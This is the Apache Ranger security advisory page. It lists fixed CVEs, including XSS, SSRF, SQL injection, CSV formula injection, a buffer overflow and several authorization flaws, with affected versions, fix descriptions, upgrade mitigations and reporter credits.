Vulnerabilities Found
Introduction
This page contains a list of security vulnerabilities that have been found in Apache Ranger. For each vulnerability, the following information is provided:
Fixed in Ranger 2.6.0
| CVE-2024-55532 |
Improper Neutralization of Formula Elements in a CSV File in Export to CSV feature of Apache Ranger |
| Severity |
Low |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
Apache Ranger versions prior to 2.6.0 |
| Users affected |
All users of ranger policy admin tool |
| Description |
Improper Neutralization issue in Export to CSV functionality |
| Fix detail |
Added logic to properly sanitize the exported content |
| Mitigation |
Users should upgrade to 2.6.0 or later version of Apache Ranger with the fix |
| Credit |
김도균 (a2256014@naver.com) |
Fixed in Ranger 2.5.0
| CVE-2024-45478 |
Stored XSS vulnerability in Edit Service Page of Apache Ranger UI |
| Severity |
Moderate |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
Apache Ranger versions prior to 2.5.0 |
| Users affected |
All users of ranger policy admin tool UI |
| Description |
Apache Ranger was found to be vulnerable to a Stored XSS issue in Edit Service functionality |
| Fix detail |
Added logic to validate the user input |
| Mitigation |
Users should upgrade to 2.5.0 or later version of Apache Ranger with the fix |
| Credit |
Gyujin |
| CVE-2024-45479 |
SSRF vulnerability in Edit Service Page of Apache Ranger UI |
| Severity |
Moderate |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
Apache Ranger versions prior to 2.5.0 |
| Users affected |
All users of ranger policy admin tool UI |
| Description |
Apache Ranger was found to be vulnerable to a SSRF issue in Edit Service functionality |
| Fix detail |
Added logic to validate the user input |
| Mitigation |
Users should upgrade to 2.5.0 or later version of Apache Ranger with the fix |
| Credit |
Gyujin |
Fixed in Ranger 2.0.0
| CVE-2019-12397 |
Apache Ranger cross site scripting issue |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.7.0 to 1.2.0 versions of Apache Ranger, prior to 2.0.0 |
| Users affected |
All users of ranger policy admin tool |
| Description |
Apache Ranger was found to be vulnerable to a Cross-Site Scripting in policy import functionality |
| Fix detail |
Added logic to sanitize the user input |
| Mitigation |
Users should upgrade to 2.0.0 or later version of Apache Ranger with the fix |
| Credit |
Jan Kaszycki from STM Solutions |
Fixed in Ranger 1.2.0
| CVE-2018-11778 |
Apache Ranger Stack based buffer overflow |
| Severity |
Critical |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
Apache Ranger versions prior to 1.2.0 |
| Users affected |
Unix Authentication Service users |
| Description |
Apache Ranger UnixAuthenticationService should properly handle user input to avoid Stack-based buffer overflow |
| Fix detail |
UnixAuthenticationService was updated to correctly handle user input |
| Mitigation |
Users should upgrade to 1.2.0 or later version of Apache Ranger with the fix |
| Credit |
Alexander Klink |
Fixed in Ranger 0.7.1
| CVE-2017-7676 |
Apache Ranger policy evaluation ignores characters after ‘*’ wildcard character |
| Severity |
Critical |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.6.x/0.7.0 versions of Apache Ranger |
| Users affected |
Environments that use Ranger policies with characters after \‘*\’ wildcard character – like my*test, test*.txt |
| Description |
Policy resource matcher effectively ignores characters after \‘*\’ wildcard character. This can result in affected policies to apply to resources where they should not be applied |
| Fix detail |
Ranger policy resource matcher was updated to correctly handle wildcard matches. |
| Mitigation |
Users should upgrade to 0.7.1 or later version of Apache Ranger with the fix |
| CVE-2017-7677 |
Apache Ranger Hive Authorizer should check for RWX permission when external location is specified |
| Severity |
Critical |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.5.x/0.6.x/0.7.0 versions of Apache Ranger |
| Users affected |
Environments that use external location for hive tables |
| Description |
Without Ranger Hive Authorizer checking RWX permission when external location is specified, there is a possibility that right permissions are not required to create the table |
| Fix detail |
Ranger Hive Authorizer was updated to correctly handle permission check with external location |
| Mitigation |
Users should upgrade to 0.7.1 or later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.3
| CVE-2016-8746 |
Apache Ranger path matching issue in policy evaluation |
| Severity |
Normal |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.6.0/0.6.1/0.6.2 versions of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Ranger policy engine incorrectly matches paths in certain conditions when policy does not contain wildcards and has recursion flag set to true |
| Fix detail |
Fixed policy evaluation logic |
| Mitigation |
Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix |
| CVE-2016-8751 |
Apache Ranger stored cross site scripting issue |
| Severity |
Normal |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.5.x and 0.6.0/0.6.1/0.6.2 versions of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Apache Ranger was found to be vulnerable to a Stored Cross-Site Scripting in when entering custom policy conditions. Admin users can store some arbitrary javascript code to be executed when normal users login and access policies |
| Fix detail |
Added logic to sanitize the user input |
| Mitigation |
Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.2
| CVE-2016-6815 |
Apache Ranger user privilege vulnerability |
| Severity |
Normal |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
All 0.5.x versions or 0.6.0/0.6.1 versions of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Users with "keyadmin" role should not be allowed to change password for users with admin role |
| Fix detail |
Added logic to validate the user privilege in the backend |
| Mitigation |
Users should upgrade to 0.6.2 or later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.1
| CVE-2016-5395 |
Apache Ranger Stored Cross Site Scripting vulnerability |
| Severity |
Normal |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
All 0.5.x versions of Apache Ranger and version 0.6.0 |
| Users affected |
All users of ranger policy admin tool |
| Description |
Apache Ranger was found to be vulnerable to a Stored Cross-Site Scripting in the create user functionality. Admin users can store some arbitrary javascript code to be executed when normal users login and access policies |
| Fix detail |
Added logic to sanitize the user input |
| Mitigation |
Users should upgrade to 0.6.1 or later version of Apache Ranger with the fix |
| Credit |
Thanks to Victor Hora from Securus Global for reporting this issue |
Fixed in Ranger 0.5.3
| CVE-2016-2174 |
Apache Ranger sql injection vulnerability |
| Severity |
Normal |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
All versions of Apache Ranger from 0.5.0 (up to 0.5.3) |
| Users affected |
All admin users of ranger policy admin tool |
| Description |
SQL Injection vulnerability in Audit > Access tab. When the user clicks an element from policyId row of the list, there is a call made underneath with eventTime parameter which contains the vulnerability. Admin users can send some arbitrary sql code to be executed along with eventTime parameter using /service/plugins/policies/eventTime url |
| Fix detail |
Replaced native queries with JPA named queries |
| Mitigation |
Users should upgrade to 0.5.3 version of Apache Ranger with the fix |
| Credit |
Thanks to Mateusz Olejarka from SecuRing for reporting this issue |
Fixed in Ranger 0.5.1
| CVE-2015-5167 |
Restrict REST API data access for non-admin users |
| Severity |
Important |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.4.0 and 0.5.0 version of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Data access restrictions via REST API are not consistent with restrictions in policy admin UI |
| Mitigation |
Users should upgrade to Ranger 0.5.1 version |
| CVE-2016-0733 |
Ranger Admin authentication issue |
| Severity |
Important |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.4.0 and 0.5.0 version of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Malicious Users can gain access to ranger admin UI without proper authentication |
| Mitigation |
Users should upgrade to Ranger 0.5.1 version |
Fixed in Ranger 0.5.0
| CVE-2015-0265 |
Apache Ranger code injection vulnerability |
| Severity |
Important |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.4.0 version of Apache Ranger |
| Users affected |
All admin users of ranger policy admin tool |
| Description |
Unauthorized users can send some javascript code to be executed in ranger policy admin tool admin sessions |
| Fix detail |
Added logic to sanitize the user input |
| Mitigation |
Users should upgrade to 0.5.0+ version of Apache Ranger with the fix |
| Credit |
Thanks to Jakub Kałużny from SecuRing for reporting this issue |
| CVE-2015-0266 |
Apache Ranger direct url access vulnerability |
| Severity |
Important |
| Vendor |
The Apache Software Foundation |
| Versions Affected |
0.4.0 version of Apache Ranger |
| Users affected |
All users of ranger policy admin tool |
| Description |
Regular users can type in the URL of modules that are accessible only to admin users |
| Fix detail |
Added logic in the backend to verify user access |
| Mitigation |
Users should upgrade to 0.5.0+ version of Apache Ranger with the fix |
| Credit |
Thanks to Jakub Kałużny from SecuRing for reporting this issue |